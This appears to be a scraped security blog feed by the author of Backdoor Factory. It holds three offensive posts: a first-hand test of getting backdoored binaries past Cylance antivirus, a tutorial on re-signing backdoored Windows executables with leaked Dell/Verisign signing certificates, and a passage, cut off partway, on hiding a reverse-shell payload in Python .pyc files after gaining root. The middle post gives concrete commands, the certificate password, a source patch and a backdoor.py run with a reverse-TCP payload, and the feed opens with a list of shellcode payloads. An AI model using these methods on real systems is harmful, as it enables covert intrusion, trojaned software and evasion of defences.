rsrcPointerToRawData: 0x7600<br />
rsrcSectionName: .rsrc<br />
rsrcSizeRawData: 0x29c00<br />
rsrcVirtualAddress: 0x3a000<br />
rsrcVirtualSize: 0x29be8<br />
supported: True<br />
textPointerToRawData: 0x400<br />
textSectionName: .text<br />
textSizeRawData: 0x5c00<br />
textVirtualAddress: 0x1000<br />
textVirtualSize: 0x5a5a<br />
************************* END flItms *************************<br />
************************* END DEBUG INFO *************************<br />
==================================================<br />
The following WinIntelPE32s are available: (use -s)<br />
cave_miner_inline<br />
iat_reverse_tcp_inline<br />
iat_reverse_tcp_inline_threaded<br />
iat_reverse_tcp_stager_threaded<br />
iat_user_supplied_shellcode_threaded<br />
meterpreter_reverse_https_threaded<br />
reverse_shell_tcp_inline<br />
reverse_tcp_stager_threaded<br />
user_supplied_shellcode_threaded<br />
<br />
<br />
<br /></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-84561656666402145482016-05-11T13:48:00.003-07:002016-05-12T10:45:44.504-07:00A Glance at CylanceNote:<br />
<div>
- Personal thoughts here, employer not represented.</div>
<div>
- I don't like AVs. The risk to performance and security doesn't make sense to me.</div>
<div>
<br /></div>
<div>
I've worked at places where AV was <b>required</b> and the security team was tasked to help SysAdmins tune (troubleshoot) AV so that the zip file created and transferred from employee to another employee did not cause an absolute system DoS (looks over at McAfee). And as most pentesters, I've been bypassing AVs for years.</div>
<div>
<br /></div>
<div>
I've heard a lot of hype around <a href="https://www.cylance.com/" target="_blank">Cylance</a> and it's AI algorithm and machine learning. And I've been wanting to test it out from an AppSec POV and if I could bypass it using my open source tools. One cannot simply download a demo of Cylance and do testing as a household consumer. It is available only to enterprises and I believe Bluecoat has adopted it as a inline scanner.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtpgyAWFC1GeGqOXLby7zP7hcd8CHzd8TLA_lWt4aM8bC33ZH9RcHFs_jFts2aWLIt9BU7SnW0yKNRBzf_IpR_gggWcXxoi-Jg7N_c-P2DHkg-pGFusPGxGDfqvwXJOzbpchVUM3vb64/s1600/IMG_1513.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtpgyAWFC1GeGqOXLby7zP7hcd8CHzd8TLA_lWt4aM8bC33ZH9RcHFs_jFts2aWLIt9BU7SnW0yKNRBzf_IpR_gggWcXxoi-Jg7N_c-P2DHkg-pGFusPGxGDfqvwXJOzbpchVUM3vb64/s320/IMG_1513.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">The hype follows me on vacation</td></tr>
</tbody></table>
<div>
Via IRC, in #BDFactory on freenode, <a href="https://twitter.com/sizzop">Sizzop</a> mentioned that Cylance was doing a tour where you could bring in your own malware for testing. I thought why not. It was (still going as of posting) called their <a href="https://www.cylance.com/events-on-tour" target="_blank">Unbelievable Tour </a>and they had one close to me in DC. So I signed up.</div>
<div>
<br /></div>
<div>
The night before I set up a blind test using binaries from <a href="http://live.sysinternals.com/" target="_blank">live.sysinternals.com</a> and a command and control server on the public internet to catch call backs.</div>
<div>
<br /></div>
<div>
I downloaded the first level of tools in the directory and set up four folders on a USB drive:</div>
<div>
<ul>
<li>Set 1: Just Sysinternals Tools with no modifications - approximately 100 binaries.</li>
<li>Set 2: Sysinternals again, though four were patched via <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">BDF</a>, added an <a href="https://github.com/Genetic-Malware/Ebowla" target="_blank">Ebowla</a> golang compiled binary with <a href="https://github.com/n1nj4sec/pupy" target="_blank">Pupy</a> as payload set to work in May 2016 (it was still April 2016), a Veil python compiled binary, a sandbox finger-printer (python pyinstaller compiled binary), a backdoored macho binary, nothing modified or custom was signed.</li>
<li>Set 3: Sysinternals with four BDF patched binaries (signed with an expired cert), an Ebowla golang compiled binary with Pupy as a payload set to execute in April 2016 only (it was April 28th).</li>
<li>Set 4: Various malformed PE file formats known (to me) to cause issues in PE file parsers.</li>
</ul>
</div>
<div>
With my USB drive burning a hole in my pocket, I arrived at the demo location - Morton's in DC (swanky). Everyone from Cylance was friendly. The demo was presented with lunch.</div>
<div>
<br /></div>
<div>
Cylance sales engineers talked about how they use AI to determine what is bad and that they have done away with dat files. The agent and all supporting files were a total of ~60 MB. Then, Cylance pitted itself against Symantec in a demo; they took about 100 known malicious samples, ran them through VMprotect and dropped all the pre and post VMprotect samples on two Windows 7 virtual machines (VMs) - one with Cylance and one with Symantec.</div>
<div>
<br /></div>
<div>
Cylance detected everything. I expected as much as they are running the demo. Symantec detected nothing (at all) and the VM became non-functional. </div>
<div>
<br /></div>
<div>
My initial impressions:</div>
<div>
<ul>
<li>The Cylance agent was really fast.</li>
<li>There seemed no impact on performance of the Cylance VM.</li>
<li>I was impressed and worried about my tests. After all BDF has been open source for three years.</li>
</ul>
</div>
<div>
After the sales presentation and demo, they offered to run malware from the audience. There were two of us that had samples for testing.</div>
<div>
<br /></div>
<div>
I went first and the results were as follows:</div>
<div>
<ul>
<li>Set 1: Some of the Sysinternals tools were flagged. Psexec for example and I think a couple more. I did not have control of the computer to determine which exactly. One thing when deploying an AV is a false positive rate. Cylance is not immune to this.</li>
<li>Set 2: The Veil payload was caught and quarantined prior to execution. One BDF payload was caught and quarantined prior to execution - it used a payload straight from metasploit. Nothing else was flagged. On physical execution, the remaining binaries connected to my command and control server.</li>
<li>Set 3: One BDF sample was flagged and quarantined. Interestingly it was a sample that I did not want caught, however, I picked the patching method myself - the code cave selection. All the BDF auto generated samples with my IAT based payloads were not flagged. Remember these samples had bad certificates. Nothing else was flagged. On physical execution, the remaining binaries connected to my command and control server. Cylance does not scan cross platform executables so my macho (OS X) backdoored binary was not scanned.</li>
<li>The sales engineer fired up a GUI control panel to scan the malformed exes. Not all of them were recognized as valid PE files (expected) and I did not see any crashes. Though the sample size was small < 20 items.</li>
</ul>
<br />
Summary:</div>
<div>
<ul>
<li>Veil 1/1 detected</li>
<li>BDF binaries that should have been detected (metasploit shellcode): 1/1</li>
<li>BDF binaries I did not want detected: 1/7</li>
<li>Ebowla: 0/2 detected</li>
<li>Pyinstaller sandbox enumerator: 0/1 detected (does nothing bad really)</li>
</ul>
<br />
The other group had a javascript encoded (.jse) file. Cylance has a script blocker of sorts that stopped execution of the file. I believe this works against powershell scripts also, but I was not prepared to test it.</div>
<div>
<br /></div>
<div>
My thoughts after testing:</div>
<div>
<ul>
<li>It was really fast. I can't say this enough.</li>
<li>With all the AI processing on the backend to make the rules for the deployed agent, the Cylance agent still has to make a determination on what is good/bad. Everything still comes down to a single if statement - let this run or don't.</li>
<li>It's still an AV. It has a kernel driver to hook binary execution. This adds an attack footprint just like any other AV. However, because it doesn't work with dat files, I think that the attack footprint is potentially smaller than other AVs. The agent still has to worry about file format parsing. I would like to do an appsec style analysis of the entire deployed platform.</li>
<li>Updates. They were stating that Cylance only updates once or twice a year as a positive. I'd imagine that they will flag BDF output in the next update. However, if there is a major outbreak of a specific type of infection that the agent does not believe is bad now, how will the agent determine if it is bad in the future? If updating the agent entirely is the only way to add new detection algorithms, then I see more frequent updates and perhaps agent bloat. </li>
<li>No comparisons against F-Secure or Kaspersky? I think Cylance's main target for competition is the US market - where McAfee and Symantec have dominance.</li>
</ul>
</div>
<div>
If your organization is in an industry where AV is required for compliance reasons <b>AND</b> it has to be from the US (you are stuck with McAfee or Symantec), I would give Cylance a demo and compare it to what you have now.</div>
<div>
<br /></div>
<div>
Update:<br />
FULL DISCLOSURE: I won a gift card for bypassing cylance.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com12tag:blogger.com,1999:blog-1658879437550643598.post-72809479173773666102015-12-16T20:31:00.000-08:002015-12-16T20:31:34.884-08:00Add PE Code Signing to Backdoor Factory (BDF)Let's say you want to add PE codesiging to your instance of BDF after you patch PE files. It's really easy. But to be honest, it's something I will not officially support in BDF for various reasons at the moment. One of them - I don't want to ship signing certs with BDF. Perhaps I'll release a pro version where I implement everything or I'll teach a class and include stuff like this. Or I'll just tell you below.<br />
<br />
Why would you want code signing in BDF?<br />
<br />
Internet browsers, like IE/edge, give a pass if the binary is signed (A/V is a another story). So if a signed binary is delivered via http, MITM'ed, unsigned, patched, the re-signed with a valid cert - a browser like IE should be ok with it. Since BDF is part of BDFProxy, then even better right?<br />
<br />
Cool, ready to add code signing to BDF?<br />
<br />
First things first, you need some signing certs.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxN8n-1K_jGM2V5hLm61PGs1hYcfIQBZrfWGdxErUE_kKTUWJ-sLufTNBWJ3ORlHEVw55JaPXLyZgDt1NHjoVRYMJ5cEwTTU75Zt9XU1aj2JiGxg3UZqHhobP4RPq40IRrhHJ9HLzIuUc/s1600/vwnsh.jpg" imageanchor="1"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxN8n-1K_jGM2V5hLm61PGs1hYcfIQBZrfWGdxErUE_kKTUWJ-sLufTNBWJ3ORlHEVw55JaPXLyZgDt1NHjoVRYMJ5cEwTTU75Zt9XU1aj2JiGxg3UZqHhobP4RPq40IRrhHJ9HLzIuUc/s400/vwnsh.jpg" width="400" /></a><br />
<br />
<br />
The kind folks at Duo Security did some great research, read it <a href="https://www.duosecurity.com/static/pdf/Dude,_You_Got_Dell_d.pdf">here</a>.<br />
<br />
Grab the certs <a href="https://www.duosecurity.com/static/files/DellCertificates.zip">here</a>.<br />
<br />
Now BDF runs great on *nix/OSX, so we need something that does PE code signing on linux.<br />
<br />
Grab <a href="http://sourceforge.net/projects/osslsigncode/">ossligncode</a> as so:<br />
<br />
$ git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode<br />
<br />
To build:<br />
<br />
$ ./autogen.sh<br />
$ ./configure<br />
$ make<br />
$ sudo make install<br />
<br />
Next we need the signing certs and we need to put them in the BDF directory.<br />
<br />
Navigate to your BDF home directory.<br />
<br />
the-backdoor-factory git:(master) $<br />
$ curl -O https://www.duosecurity.com/static/files/DellCertificates.zip<br />
$ mkdir certs<br />
$ unzip DellCertificates.zip -d certs<br />
<br />
$ tree certs<br />
certs<br />
├── Verisign.pass<br />
├── Verisign.pfx<br />
├── __MACOSX<br />
├── eDellRoot.cer<br />
└── eDellRootLocalhost.cer<br />
<br />
Let's use the verisign cert.<br />
<br />
We'll need to convert the pfx format to cer/pem as that is what osslsigncode prefers.<br />
<br />
$ openssl pkcs12 -in certs/Verisign.pfx -out certs/Verisign.cer -nodes<br />
Enter Import Password: t-span<br />
<br />
OK.<br />
<br />
Now we need to make a private key.<br />
<br />
$ openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem <br />
Enter Import Password: t-span<br />
MAC verified OK<br />
Enter PEM pass phrase: moomoo<br />
Verifying - Enter PEM pass phrase: moomoo<br />
<br />
Let's test everything out:<br />
<br />
$ curl -O http://live.sysinternals.com/tcpview.exe # yay http<br />
<br />
$ osslsigncode extract-signature -in tcpview.exe -out sig.txt<br />
<br />
$ hexdump -C sig.txt<br />
<br />
And you should see something like this: http://pastebin.com/My9UHyjS<br />
Clearly from Microsoft!<br />
<br />
Test run:<br />
<br />
$ osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo<br />
Succeeded<br />
<br />
$ osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt<br />
<br />
$ hexdump -C sig1.txt<br />
<br />
And you should see something like this: http://pastebin.com/BSEzgS5q<br />
Clearly not from Microsoft!<br />
<br />
And if you upload to VirusTotal you'll see the signature is fully signed in the 'Signers' section and not by MS: https://www.virustotal.com/en/file/65b06e906b17c9f164937826575fc45f4c5f152ef8abfc324368eb46bb0028dc/analysis/1450316795/<br />
<br />
Your certs directory should now look as so:<br />
$ tree certs<br />
certs<br />
├── Verisign.cer<br />
├── Verisign.pass<br />
├── Verisign.pfx<br />
├── VerisignPrivateKey.pem<br />
├── __MACOSX<br />
├── eDellRoot.cer<br />
└── eDellRootLocalhost.cer<br />
<br />
Time to modify BDF source code!!<br />
<br />
<div style="font-family: Helvetica; font-size: 12px; line-height: normal;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8uQxSZSg1j5bmc3LeSKqlvY4P_vPuO7-yTVQvS7dszgCNyZy9-FaE0_6eFARZXqkUiNhy-7dN772BZzGXvZw31JzBcbLtwWiUfNJpV_XpqIQXKzwViZdHTLzgbT0bb3j1_Y6V40Xersw/s1600/its_happening.gif" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8uQxSZSg1j5bmc3LeSKqlvY4P_vPuO7-yTVQvS7dszgCNyZy9-FaE0_6eFARZXqkUiNhy-7dN772BZzGXvZw31JzBcbLtwWiUfNJpV_XpqIQXKzwViZdHTLzgbT0bb3j1_Y6V40Xersw/s400/its_happening.gif" /></a></div>
<br />
Open pebin.py in your favorite editor.<br />
<br />
Navigate to the bottom of the "def patch_pe(self):" function.<br />
<br />
Near the bottom of that function we will modify...<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjncwxBRL2M5RgM9TaFQ8c8HUxNzLgyhhOfJ7vJLMe1epAQn-5_fpqn7nzn_wjB98O5tM2HnKr72VwJPObBvTS1BhLKIS25BY69MWqhqGGJwqmQrjSMLcL8c-y3InBQeSY8fNtpeszBPSo/s1600/BDF_signing.png" imageanchor="1"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjncwxBRL2M5RgM9TaFQ8c8HUxNzLgyhhOfJ7vJLMe1epAQn-5_fpqn7nzn_wjB98O5tM2HnKr72VwJPObBvTS1BhLKIS25BY69MWqhqGGJwqmQrjSMLcL8c-y3InBQeSY8fNtpeszBPSo/s640/BDF_signing.png" width="640" /></a><br />
<br />
...with the following code...<br />
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
if self.ZERO_CERT is True:</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
# cert was removed earlier </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])</div>
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
p.wait()</div>
<div>
<br /></div>
<div>
... so it looks like this afterwards:</div>
<div>
<br /></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjMNVonhkkQQjp3eaHiDRGYoZRwmyjolQEL_N35ki_FMKq2Cq15ysHLooZ31a5LFQZfXY7J1C_tmAG8ccgh900YaHwGIzodzfOfbgx372cxifcSwOYcxQwCPA9LNEcxFA6ji9bgIj5AWs/s1600/BDF_signing_after.png" imageanchor="1"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjMNVonhkkQQjp3eaHiDRGYoZRwmyjolQEL_N35ki_FMKq2Cq15ysHLooZ31a5LFQZfXY7J1C_tmAG8ccgh900YaHwGIzodzfOfbgx372cxifcSwOYcxQwCPA9LNEcxFA6ji9bgIj5AWs/s640/BDF_signing_after.png" width="640" /></a></div>
<br />
After this mod to BDF you should see the following after running a similar command:<br />
<br />
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
__________ __ .___ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\______ \_____ ____ | | __ __| _/____ ___________ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__| </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\/ \/ \/ \/ \/ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
___________ __ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\_ _____/____ _____/ |_ ___________ ___.__. </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| __) \__ \ _/ ___\ __\/ _ \_ __ < | | </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
| \ / __ \\ \___| | ( <_> ) | \/\___ | </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\___ / (____ /\___ >__| \____/|__| / ____| </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
\/ \/ \/ \/ </div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
<br /></div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Author: Joshua Pitts</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Email: the.midnite.runr[-at ]gmail<d o-t>com</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Twitter: @midnite_runr</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
IRC: freenode.net #BDFactory</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Version: 3.2.4</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal; min-height: 14px;">
</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] In the backdoor module</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Checking if binary is supported</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Gathering file info</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Reading win32 entry instructions</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Gathering file info</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Overwriting certificate table pointer</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Loading PE in pefile</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Parsing data directories</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for and setting selected shellcode</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Creating win32 resume execution stub</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for caves that will fit the minimum shellcode length of 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] All caves lengths: 145, 162, 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Attempting PE File Automatic Patching</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 50: Section Name: .data; Cave begin: 0x44cc5 End: 0x44d6b; Cave Size: 166; Payload Size: 162</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 32: Section Name: .text; Cave begin: 0x3a304 End: 0x3a399; Cave Size: 149; Payload Size: 145</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 87</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .rdata</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .text</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Changing flags for section: .data</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Patching initial entry instructions</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Creating win32 resume execution stub</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
[*] Looking for and setting selected shellcode</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
Succeeded</div>
<div style="background-color: black; color: whitesmoke; font-family: Monaco; font-size: 10px; line-height: normal;">
File tcpview.exe is in the 'backdoored' directory</div>
<div>
<br /></div>
<div>
Note the 'Succeeded'.</div>
<div>
<br /></div>
<div>
As expected, here's the result with a valid signature from Atheros:</div>
<div>
<br /></div>
<div>
<a href="https://www.virustotal.com/en/file/3707714825a8829666d3f116eabac73aa965c0e93532fca78d5078b8c5445f0b/analysis/1450322931/">https://www.virustotal.com/en/file/3707714825a8829666d3f116eabac73aa965c0e93532fca78d5078b8c5445f0b/analysis/1450322931/</a></div>
<div>
<br /></div>
<div>
This can be done with any PE code signing cert that is <strike>released</strike> leaked to the public. Get creative! If you think this should be part of BDF, let me know on <a href="https://twitter.com/midnite_runr">twitter</a> or <a href="https://github.com/secretsquirrel/the-backdoor-factory">github</a>.</div>
<div>
<br /></div>
<div>
Cheers.</div>
<br />
<br />midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com10tag:blogger.com,1999:blog-1658879437550643598.post-16448891502666802422015-11-09T18:58:00.000-08:002015-11-09T18:58:16.220-08:00Backdooring Python via PYC ( /ˈpiː/ - /ˈwaɪ/ - /ˈsiː/)Hello Again.<br />
<br />
It's been a while.<br />
<br />
Believe it or not I have not been on a distance island selling 0days and stocks options.<br />
<br />
While working on some python internals and source code review, I thought, how easy would it be to backdoor python after OS exploitation or some other form of access?<br />
<br />
The answer is "really easy." But you want to stay hidden, not in plain sight, and within the constructs of what is already on disk. This assumes you have root access and that the machine has python installed.<br />
<br />
And it is all via the pyc file. I'm not talking about patching python itself with <a href="https://github.com/secretsquirrel/the-backdoor-factory">BDF</a>. That could be easier to catch.<br />
<br />
/*<br />
Also before I forget, most of this blog post was written before I found the right google search term for prior research and work. Here's what I found:<br />
<br />
<ul>
<li><a href="https://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-reversing-Python#id3072912">https://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-reversing-Python#id3072912</a></li>
<li><a href="https://github.com/jgeralnik/Pytroj">https://github.com/jgeralnik/Pytroj</a></li>
<li><a href="http://www.slideshare.net/iamit/infecting-python-bytecode">http://www.slideshare.net/iamit/infecting-python-bytecode</a></li>
</ul>
<div>
<br /></div>
<div>
The prior work included in the Pytroj github repo includes pyc infection of bytecode, that infects other pyc bytecode in the loaded program, for python27.</div>
<br />
*/<br />
<br />
As most of you know, pyc files are python bytecode that is either created by importing the file into an interpreter, or another file, or by calling python -m compileall [path]..<br />
<br />
... or py_compile...<br />
<br />
When a python file is called and a pyc file is present for an existing py file, python will check the timestamp four bytes into the pyc file and if this timestamp equals the timestamp of the parent py file modified time, then it will not over write the pyc file. That's it. That's all the integrity checks for python27. Python3.X adds a check to see that the size is correct. You can simply copy the size over from the old pyc file to your new pyc file. That's really the only time it is checked. To restore the child pyc file you need to either delete the pyc file or modify the parent. Running py_compile will not modify the child pyc as the timestamp will be the same as the parent.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ucFowh-KP9Ha4jDteaVgDl4f8gG7bk2M6pV0AGr5rDTDZjQUq3zkl8e0qjtMLjum1GtYUgL_2_4VH-5v9Xh6pNlVC6_YTwNykIJmXBgPiKw1HjKO-QPknfxaXg_Wq9OSStgfsyoM_Qk/s1600/timestamp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ucFowh-KP9Ha4jDteaVgDl4f8gG7bk2M6pV0AGr5rDTDZjQUq3zkl8e0qjtMLjum1GtYUgL_2_4VH-5v9Xh6pNlVC6_YTwNykIJmXBgPiKw1HjKO-QPknfxaXg_Wq9OSStgfsyoM_Qk/s640/timestamp.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Checking Modified Timestamps</td></tr>
</tbody></table>
<br />
<br />
The POC that I have is for python 2.7 and python3.X. And you can get it here <a href="https://github.com/secretsquirrel/backdoor-pyc/">https://github.com/secretsquirrel/backdoor-pyc/</a><br />
<br />
You may be asking yourself so what? Someone could just update the python code directly.<br />
<br />
You are right. Here have a cookie.<br />
<br />
However, when was the last time you decompiled your python bytecode because you thought it was modified from the original python file?<br />
<br />
OK. How does it work?<br />
<br />
I've selected ./Lib/utf_8.pyc as my code to patch in python2.7. Why? Because when looking at the loading of python via python -v it's one of the later modules to load. And because of that, I can modify it with a payload, and most of the modules that I need are already available to use.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrf1xY4ApwEJuf6uceLmOAEPpRuv4wZDODbJGIBgL2eJtMEWwEggJ7gN7ThDg6v4rFWby190BI-l_Qi8f_VboNUY1c2WmecLBz20lMCrd3eiOu_j45_Xb1nkb-PgWJdLYp773lBygvFbo/s1600/python2.7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrf1xY4ApwEJuf6uceLmOAEPpRuv4wZDODbJGIBgL2eJtMEWwEggJ7gN7ThDg6v4rFWby190BI-l_Qi8f_VboNUY1c2WmecLBz20lMCrd3eiOu_j45_Xb1nkb-PgWJdLYp773lBygvFbo/s640/python2.7.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
For python3.X, you are better off going with the rlcompleter.py.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO2uTou-WOJok2IvctGzoW8oW3_UvLknEcLaGR1PwqWsd5C7RxP9Cvqg6GUN32PNs5xofZA7eeleewB72kBocyMCn4I9j1n1UM0qTBO0dJD-2JaAFXodVWB7U_BCviKKsS_Qf8oB0ZuE/s1600/python3.5_loaded_mods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO2uTou-WOJok2IvctGzoW8oW3_UvLknEcLaGR1PwqWsd5C7RxP9Cvqg6GUN32PNs5xofZA7eeleewB72kBocyMCn4I9j1n1UM0qTBO0dJD-2JaAFXodVWB7U_BCviKKsS_Qf8oB0ZuE/s640/python3.5_loaded_mods.png" width="640" /></a></div>
<br />
<br />
I made a simple payload from of a python shell (from trustedsec) and added multiprocessing to it so that python will execute after the shell has been spawned.<br />
<br />
